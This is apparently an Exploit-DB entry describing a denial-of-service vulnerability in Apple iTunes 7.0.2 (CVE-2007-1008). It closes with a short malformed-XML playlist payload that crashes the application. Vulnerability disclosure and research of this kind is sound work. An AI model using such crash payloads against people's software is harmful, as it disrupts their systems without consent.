Apple iTunes 7.0.2 XML Parsing Remote Denial of Service Vulnerability

2007-02-19T00:00:00
ID EDB-ID:29616
Type exploitdb
Reporter poplix
Modified 2007-02-19T00:00:00

Description

Apple iTunes 7.0.2 XML Parsing Remote Denial of Service Vulnerability. CVE-2007-1008. Dos exploit for osx platform

                                        
                                            source: http://www.securityfocus.com/bid/22615/info

Apple iTunes is prone to a remote denial-of-service vulnerability because the application fails to handle malformed XML playlist files.

An attacker can exploit this issue to crash the application, triggering a denial-of-service condition.

Apple iTunes version 7.0.2 for Intel and PowerPC are vulnerable to this issue; other versions may also be affected. 

<?die with your boots on?>
<kb:station_record>
<kb:station_url_record>
</kb:station_url_record>